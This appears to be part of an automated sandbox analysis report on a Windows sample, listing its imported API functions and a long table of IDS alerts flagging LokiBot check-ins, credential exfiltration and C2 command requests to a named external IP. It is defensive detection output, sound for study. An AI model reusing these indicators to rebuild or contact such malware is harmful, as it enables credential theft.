VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                              USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                              GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                              COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                              ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                              SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                              ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                              OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
                              DescriptionData
                              Translation0x0809 0x04b0
                              Language of compilation systemCountry where language is spokenMap
                              EnglishGreat Britain
                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                              2025-02-20T03:43:14.427531+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.64.180192.168.2.450067TCP
                              2025-02-20T03:43:14.532930+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.449731104.21.64.180TCP
                              2025-02-20T03:43:14.532930+01002025381ET MALWARE LokiBot Checkin1192.168.2.449731104.21.64.180TCP
                              2025-02-20T03:43:14.532930+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.449731104.21.64.180TCP
                              2025-02-20T03:43:15.323418+01002024312ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M11192.168.2.449731104.21.64.180TCP
                              2025-02-20T03:43:16.479030+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.449732104.21.64.180TCP
                              2025-02-20T03:43:16.479030+01002025381ET MALWARE LokiBot Checkin1192.168.2.449732104.21.64.180TCP
                              2025-02-20T03:43:16.479030+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.449732104.21.64.180TCP
                              2025-02-20T03:43:17.388825+01002024312ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M11192.168.2.449732104.21.64.180TCP
                              2025-02-20T03:43:17.451575+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.449733104.21.64.180TCP
                              2025-02-20T03:43:17.451575+01002025381ET MALWARE LokiBot Checkin1192.168.2.449733104.21.64.180TCP
                              2025-02-20T03:43:17.451575+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.449733104.21.64.180TCP
                              2025-02-20T03:43:18.278303+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.449733104.21.64.180TCP
                              2025-02-20T03:43:18.285091+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.64.180192.168.2.449733TCP
                              2025-02-20T03:43:19.442017+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.449734104.21.64.180TCP
                              2025-02-20T03:43:19.442017+01002025381ET MALWARE LokiBot Checkin1192.168.2.449734104.21.64.180TCP
                              2025-02-20T03:43:19.442017+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.449734104.21.64.180TCP
                              2025-02-20T03:43:20.267191+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.449734104.21.64.180TCP
                              2025-02-20T03:43:20.272240+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.64.180192.168.2.449734TCP
                              2025-02-20T03:43:21.771429+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.449735104.21.64.180TCP
                              2025-02-20T03:43:21.771429+01002025381ET MALWARE LokiBot Checkin1192.168.2.449735104.21.64.180TCP
                              2025-02-20T03:43:21.771429+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.449735104.21.64.180TCP
                              2025-02-20T03:43:22.574776+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.449735104.21.64.180TCP
                              2025-02-20T03:43:22.580509+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.64.180192.168.2.449735TCP
                              2025-02-20T03:43:23.729997+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.449736104.21.64.180TCP
                              2025-02-20T03:43:23.729997+01002025381ET MALWARE LokiBot Checkin1192.168.2.449736104.21.64.180TCP
                              2025-02-20T03:43:23.729997+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.449736104.21.64.180TCP
                              2025-02-20T03:43:24.489416+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.449736104.21.64.180TCP
                              2025-02-20T03:43:25.651126+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.449737104.21.64.180TCP
                              2025-02-20T03:43:25.651126+01002025381ET MALWARE LokiBot Checkin1192.168.2.449737104.21.64.180TCP
                              2025-02-20T03:43:25.651126+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.449737104.21.64.180TCP
                              2025-02-20T03:43:26.463190+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.449737104.21.64.180TCP
                              2025-02-20T03:43:26.470269+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.64.180192.168.2.449737TCP
                              2025-02-20T03:43:27.752713+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.449738104.21.64.180TCP
                              2025-02-20T03:43:27.752713+01002025381ET MALWARE LokiBot Checkin1192.168.2.449738104.21.64.180TCP
                              2025-02-20T03:43:27.752713+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.449738104.21.64.180TCP
                              2025-02-20T03:43:28.504763+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.449738104.21.64.180TCP
                              2025-02-20T03:43:29.660543+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.449741104.21.64.180TCP
                              2025-02-20T03:43:29.660543+01002025381ET MALWARE LokiBot Checkin1192.168.2.449741104.21.64.180TCP
                              2025-02-20T03:43:29.660543+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.449741104.21.64.180TCP
                              2025-02-20T03:43:30.375616+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.449741104.21.64.180TCP
                              2025-02-20T03:43:31.521910+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.449745104.21.64.180TCP
                              2025-02-20T03:43:31.521910+01002025381ET MALWARE LokiBot Checkin1192.168.2.449745104.21.64.180TCP
                              2025-02-20T03:43:31.521910+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.449745104.21.64.180TCP
                              2025-02-20T03:43:32.302084+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.449745104.21.64.180TCP
                              2025-02-20T03:43:32.309783+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.64.180192.168.2.449745TCP
                              2025-02-20T03:43:33.456489+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.449747104.21.64.180TCP
                              2025-02-20T03:43:33.456489+01002025381ET MALWARE LokiBot Checkin1192.168.2.449747104.21.64.180TCP
                              2025-02-20T03:43:33.456489+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.449747104.21.64.180TCP
                              2025-02-20T03:43:34.207473+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.449747104.21.64.180TCP
                              2025-02-20T03:43:35.363345+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.449748104.21.64.180TCP
                              2025-02-20T03:43:35.363345+01002025381ET MALWARE LokiBot Checkin1192.168.2.449748104.21.64.180TCP
                              2025-02-20T03:43:35.363345+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.449748104.21.64.180TCP
                              2025-02-20T03:43:36.139359+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.449748104.21.64.180TCP
                              2025-02-20T03:43:37.303125+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.449749104.21.64.180TCP
                              2025-02-20T03:43:37.303125+01002025381ET MALWARE LokiBot Checkin1192.168.2.449749104.21.64.180TCP
                              2025-02-20T03:43:37.303125+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.449749104.21.64.180TCP
                              2025-02-20T03:43:38.070830+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.449749104.21.64.180TCP
                              2025-02-20T03:43:38.075914+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.64.180192.168.2.449749TCP
                              2025-02-20T03:43:39.205648+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.449750104.21.64.180TCP
                              2025-02-20T03:43:39.205648+01002025381ET MALWARE LokiBot Checkin1192.168.2.449750104.21.64.180TCP
                              2025-02-20T03:43:39.205648+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.449750104.21.64.180TCP
                              2025-02-20T03:43:39.936584+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.449750104.21.64.180TCP
                              2025-02-20T03:43:41.134380+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.449751104.21.64.180TCP
                              2025-02-20T03:43:41.134380+01002025381ET MALWARE LokiBot Checkin1192.168.2.449751104.21.64.180TCP
                              2025-02-20T03:43:41.134380+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.449751104.21.64.180TCP
                              2025-02-20T03:43:41.914924+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.449751104.21.64.180TCP
                              2025-02-20T03:43:41.920221+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.64.180192.168.2.449751TCP
                              2025-02-20T03:43:43.094784+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.449752104.21.64.180TCP
                              2025-02-20T03:43:43.094784+01002025381ET MALWARE LokiBot Checkin1192.168.2.449752104.21.64.180TCP
                              2025-02-20T03:43:43.094784+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.449752104.21.64.180TCP
                              2025-02-20T03:43:43.907574+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.449752104.21.64.180TCP
                              2025-02-20T03:43:43.912590+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.64.180192.168.2.449752TCP
                              2025-02-20T03:43:45.102723+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.449753104.21.64.180TCP
                              2025-02-20T03:43:45.102723+01002025381ET MALWARE LokiBot Checkin1192.168.2.449753104.21.64.180TCP
                              2025-02-20T03:43:45.102723+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.449753104.21.64.180TCP
                              2025-02-20T03:43:45.839243+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.449753104.21.64.180TCP
                              2025-02-20T03:43:46.997245+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.449754104.21.64.180TCP
                              2025-02-20T03:43:46.997245+01002025381ET MALWARE LokiBot Checkin1192.168.2.449754104.21.64.180TCP
                              2025-02-20T03:43:46.997245+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.449754104.21.64.180TCP
                              2025-02-20T03:43:47.712754+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.449754104.21.64.180TCP
                              2025-02-20T03:43:47.717726+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.64.180192.168.2.449754TCP
                              2025-02-20T03:43:48.866259+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.449755104.21.64.180TCP
                              2025-02-20T03:43:48.866259+01002025381ET MALWARE LokiBot Checkin1192.168.2.449755104.21.64.180TCP
                              2025-02-20T03:43:48.866259+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.449755104.21.64.180TCP
                              2025-02-20T03:43:49.660952+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.449755104.21.64.180TCP
                              2025-02-20T03:43:49.667999+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.64.180192.168.2.449755TCP
                              2025-02-20T03:43:50.820013+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.449756104.21.64.180TCP
                              2025-02-20T03:43:50.820013+01002025381ET MALWARE LokiBot Checkin1192.168.2.449756104.21.64.180TCP
                              2025-02-20T03:43:50.820013+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.449756104.21.64.180TCP
                              2025-02-20T03:43:51.567802+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.449756104.21.64.180TCP
                              2025-02-20T03:43:52.721741+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.449757104.21.64.180TCP
                              2025-02-20T03:43:52.721741+01002025381ET MALWARE LokiBot Checkin1192.168.2.449757104.21.64.180TCP
                              2025-02-20T03:43:52.721741+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.449757104.21.64.180TCP
                              2025-02-20T03:43:53.545131+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.449757104.21.64.180TCP
                              2025-02-20T03:43:53.550248+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.64.180192.168.2.449757TCP
                              2025-02-20T03:43:54.693351+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.449758104.21.64.180TCP
                              2025-02-20T03:43:54.693351+01002025381ET MALWARE LokiBot Checkin1192.168.2.449758104.21.64.180TCP
                              2025-02-20T03:43:54.693351+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.449758104.21.64.180TCP
                              2025-02-20T03:43:55.482262+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.449758104.21.64.180TCP
                              2025-02-20T03:43:55.488427+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.64.180192.168.2.449758TCP
                              2025-02-20T03:43:56.661305+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.449759104.21.64.180TCP
                              2025-02-20T03:43:56.661305+01002025381ET MALWARE LokiBot Checkin1192.168.2.449759104.21.64.180TCP
                              2025-02-20T03:43:56.661305+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.449759104.21.64.180TCP
                              2025-02-20T03:43:57.403205+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.449759104.21.64.180TCP
                              2025-02-20T03:43:58.705695+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.449760104.21.64.180TCP
                              2025-02-20T03:43:58.705695+01002025381ET MALWARE LokiBot Checkin1192.168.2.449760104.21.64.180TCP
                              2025-02-20T03:43:58.705695+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.449760104.21.64.180TCP
                              2025-02-20T03:43:59.467933+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.449760104.21.64.180TCP
                              2025-02-20T03:43:59.472981+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.64.180192.168.2.449760TCP
                              2025-02-20T03:44:00.632178+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.449761104.21.64.180TCP
                              2025-02-20T03:44:00.632178+01002025381ET MALWARE LokiBot Checkin1192.168.2.449761104.21.64.180TCP
                              2025-02-20T03:44:00.632178+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.449761104.21.64.180TCP
                              2025-02-20T03:44:01.394606+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.449761104.21.64.180TCP
                              2025-02-20T03:44:01.399671+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.64.180192.168.2.449761TCP
                              2025-02-20T03:44:02.549016+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.449762104.21.64.180TCP
                              2025-02-20T03:44:02.549016+01002025381ET MALWARE LokiBot Checkin1192.168.2.449762104.21.64.180TCP
                              2025-02-20T03:44:02.549016+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.449762104.21.64.180TCP
                              2025-02-20T03:44:03.203757+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.449762104.21.64.180TCP
                              2025-02-20T03:44:03.208740+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.64.180192.168.2.449762TCP
                              2025-02-20T03:44:04.348269+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.449763104.21.64.180TCP
                              2025-02-20T03:44:04.348269+01002025381ET MALWARE LokiBot Checkin1192.168.2.449763104.21.64.180TCP
                              2025-02-20T03:44:04.348269+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.449763104.21.64.180TCP
                              2025-02-20T03:44:05.170718+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.449763104.21.64.180TCP
                              2025-02-20T03:44:05.175755+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.64.180192.168.2.449763TCP
                              2025-02-20T03:44:06.337593+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.449764104.21.64.180TCP
                              2025-02-20T03:44:06.337593+01002025381ET MALWARE LokiBot Checkin1192.168.2.449764104.21.64.180TCP
                              2025-02-20T03:44:06.337593+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.449764104.21.64.180TCP
                              2025-02-20T03:44:07.123723+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.449764104.21.64.180TCP
                              2025-02-20T03:44:08.290722+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.449766104.21.64.180TCP
                              2025-02-20T03:44:08.290722+01002025381ET MALWARE LokiBot Checkin1192.168.2.449766104.21.64.180TCP
                              2025-02-20T03:44:08.290722+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.449766104.21.64.180TCP
                              2025-02-20T03:44:09.168850+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.449766104.21.64.180TCP
                              2025-02-20T03:44:09.173953+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.64.180192.168.2.449766TCP
                              2025-02-20T03:44:10.316672+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.449768104.21.64.180TCP
                              2025-02-20T03:44:10.316672+01002025381ET MALWARE LokiBot Checkin1192.168.2.449768104.21.64.180TCP
                              2025-02-20T03:44:10.316672+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.449768104.21.64.180TCP
                              2025-02-20T03:44:11.054295+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.449768104.21.64.180TCP
                              2025-02-20T03:44:12.216353+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.449779104.21.64.180TCP
                              2025-02-20T03:44:12.216353+01002025381ET MALWARE LokiBot Checkin1192.168.2.449779104.21.64.180TCP
                              2025-02-20T03:44:12.216353+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.449779104.21.64.180TCP
                              2025-02-20T03:44:13.092683+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.449779104.21.64.180TCP
                              2025-02-20T03:44:13.099060+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.64.180192.168.2.449779TCP
                              2025-02-20T03:44:14.257584+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.449793104.21.64.180TCP
                              2025-02-20T03:44:14.257584+01002025381ET MALWARE LokiBot Checkin1192.168.2.449793104.21.64.180TCP
                              2025-02-20T03:44:14.257584+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.449793104.21.64.180TCP
                              2025-02-20T03:44:15.060888+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.449793104.21.64.180TCP
                              2025-02-20T03:44:15.066841+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.64.180192.168.2.449793TCP
                              2025-02-20T03:44:16.237190+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.449806104.21.64.180TCP
                              2025-02-20T03:44:16.237190+01002025381ET MALWARE LokiBot Checkin1192.168.2.449806104.21.64.180TCP
                              2025-02-20T03:44:16.237190+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.449806104.21.64.180TCP
                              2025-02-20T03:44:17.017876+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.449806104.21.64.180TCP
                              2025-02-20T03:44:17.022997+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.64.180192.168.2.449806TCP
                              2025-02-20T03:44:18.180783+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.449819104.21.64.180TCP
                              2025-02-20T03:44:18.180783+01002025381ET MALWARE LokiBot Checkin1192.168.2.449819104.21.64.180TCP
                              2025-02-20T03:44:18.180783+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.449819104.21.64.180TCP
                              2025-02-20T03:44:18.948386+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.449819104.21.64.180TCP
                              2025-02-20T03:44:20.117514+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.449829104.21.64.180TCP
                              2025-02-20T03:44:20.117514+01002025381ET MALWARE LokiBot Checkin1192.168.2.449829104.21.64.180TCP
                              2025-02-20T03:44:20.117514+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.449829104.21.64.180TCP
                              2025-02-20T03:44:20.910590+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.449829104.21.64.180TCP
                              2025-02-20T03:44:20.915778+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.64.180192.168.2.449829TCP
                              2025-02-20T03:44:22.080002+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.449840104.21.64.180TCP
                              2025-02-20T03:44:22.080002+01002025381ET MALWARE LokiBot Checkin1192.168.2.449840104.21.64.180TCP
                              2025-02-20T03:44:22.080002+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.449840104.21.64.180TCP
                              2025-02-20T03:44:22.852440+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.449840104.21.64.180TCP
                              2025-02-20T03:44:24.005441+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.449854104.21.64.180TCP
                              2025-02-20T03:44:24.005441+01002025381ET MALWARE LokiBot Checkin1192.168.2.449854104.21.64.180TCP
                              2025-02-20T03:44:24.005441+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.449854104.21.64.180TCP
                              2025-02-20T03:44:24.819834+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.449854104.21.64.180TCP
                              2025-02-20T03:44:24.824962+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.64.180192.168.2.449854TCP
                              2025-02-20T03:44:25.986832+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.449868104.21.64.180TCP
                              2025-02-20T03:44:25.986832+01002025381ET MALWARE LokiBot Checkin1192.168.2.449868104.21.64.180TCP
                              2025-02-20T03:44:25.986832+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.449868104.21.64.180TCP
                              2025-02-20T03:44:26.634314+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.449868104.21.64.180TCP
                              2025-02-20T03:44:26.639425+01002025483ET MALWARE LokiBot Fake 404 Response1104.21.64.180192.168.2.449868TCP
                              2025-02-20T03:44:27.785264+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.449881104.21.64.180TCP
                              2025-02-20T03:44:27.785264+01002025381ET MALWARE LokiBot Checkin1192.168.2.449881104.21.64.180TCP
                              2025-02-20T03:44:27.785264+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.449881104.21.64.180TCP
                              2025-02-20T03:44:28.529010+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.449881104.21.64.180TCP
                              2025-02-20T03:44:29.675258+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.449892104.21.64.180TCP
                              2025-02-20T03:44:29.675258+01002025381ET MALWARE LokiBot Checkin1192.168.2.449892104.21.64.180TCP
